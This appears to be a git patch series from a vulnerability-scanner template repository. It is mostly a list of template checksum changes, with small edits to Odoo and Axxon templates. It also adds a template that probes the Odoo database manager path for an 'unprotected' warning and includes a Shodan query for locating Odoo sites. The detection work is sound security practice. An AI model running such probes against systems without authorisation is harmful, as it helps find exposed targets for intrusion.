+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
+http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
-http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
+http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
-http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453
http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
http/technologies/wordpress-detect.yaml:fcd6c47e6ae72e3d87671b6cd0b892a0879adfec
http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -6336,7 +6337,7 @@ network/cves/2017/CVE-2017-5645.yaml:73fa585ece4f10781721c99f894c4210175ad9df
network/cves/2018/CVE-2018-2628.yaml:745a4bcbf8dacea7659023d8a14b4c58e8a7ca6e
network/cves/2018/CVE-2018-2893.yaml:0a6d9638d166fb7b9c70b66eda35074a3160d35d
network/cves/2020/CVE-2020-11981.yaml:8cf01204e15f9205225a407e3573d04f1a3ebd7d
-network/cves/2020/CVE-2020-1938.yaml:ec1011a5a9d78a308f1cb0d4dfe6c8e6fb2d1683
+network/cves/2020/CVE-2020-1938.yaml:f42c5ab49582e8cfb2ef258c578b687c67556a9d
network/cves/2020/CVE-2020-7247.yaml:731f878bf6fecab9df6d650f68e391befb479abe
network/cves/2021/CVE-2021-44521.yaml:337b7c516051ab9f27e3a87649c82108597cf54d
network/cves/2022/CVE-2022-0543.yaml:12250c6e9c2b36c2d1c286398819688e03f71817
@@ -6442,7 +6443,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec
-templates-checksum.txt:bc8ae926a6ea9b5e1a8985ea717d2bc4eb46a9a0
+templates-checksum.txt:28e5734ef3276f9e712d0165107a88786c3e2731
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From c40a6cae155b1ac22b56cc828db2709deb2501a5 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 23 Jun 2023 07:21:04 +0000
Subject: [PATCH 510/670] TemplateMan Update [Fri Jun 23 07:21:04 UTC 2023]
:robot:
---
http/exposed-panels/axxon-client-panel.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml
index 78e36e7ee9..d5d42063a0 100644
--- a/http/exposed-panels/axxon-client-panel.yaml
+++ b/http/exposed-panels/axxon-client-panel.yaml
@@ -9,11 +9,11 @@ info:
- https://www.axxonsoft.com/products/video-management-software
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- verified: true
+ max-request: 1
shodan-query: title:"Axxon Next client"
+ verified: true
tags: panel,axxon,vms,login,detect
http:
From 4c81209cce7609f18d54f16c0d40359f649a6f97 Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Fri, 23 Jun 2023 15:43:00 +0530
Subject: [PATCH 511/670] template fixes (#7523)
---
.../exposed-panels/odoo-database-manager.yaml | 6 ++--
.../odoo-unprotected-database.yaml | 30 +++++++++++++++++++
2 files changed, 32 insertions(+), 4 deletions(-)
create mode 100644 http/misconfiguration/odoo-unprotected-database.yaml
diff --git a/http/exposed-panels/odoo-database-manager.yaml b/http/exposed-panels/odoo-database-manager.yaml
index d3e2d08953..9fa4ba6883 100644
--- a/http/exposed-panels/odoo-database-manager.yaml
+++ b/http/exposed-panels/odoo-database-manager.yaml
@@ -3,7 +3,7 @@ id: odoo-database-manager
info:
name: Odoo - Database Manager Discovery
author: __Fazal,R3dg33k
- severity: critical
+ severity: low
description: Odoo database manager was discovered.
metadata:
max-request: 1
@@ -26,6 +26,4 @@ http:
- type: status
status:
- - 200
-
-# Enhanced by mp on 2022/07/15
+ - 200
\ No newline at end of file
diff --git a/http/misconfiguration/odoo-unprotected-database.yaml b/http/misconfiguration/odoo-unprotected-database.yaml
new file mode 100644
index 0000000000..33b55d10e9
--- /dev/null
+++ b/http/misconfiguration/odoo-unprotected-database.yaml
@@ -0,0 +1,30 @@
+id: odoo-unprotected-database
+
+info:
+ name: Odoo - Unprotected Database
+ author: pdteam
+ severity: critical
+ description: |
+ The system has an Odoo application whose database manager is unprotected, indicating potential unauthorized access.
+ remediation: |
+ Implement and enforce proper authentication and access control measures to protect the Odoo database manager.
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: title:"Odoo"
+ tags: odoo,database,unauth
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/web/database/manager'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Warning, your Odoo database manager is not protected."
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
From 1a96a18d38a0905012dd1213179ea1ebabbc3166 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 23 Jun 2023 10:13:20 +0000
Subject: [PATCH 512/670] Auto Generated New Template Addition List [Fri Jun 23
10:13:20 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 391c239b39..4707983113 100644
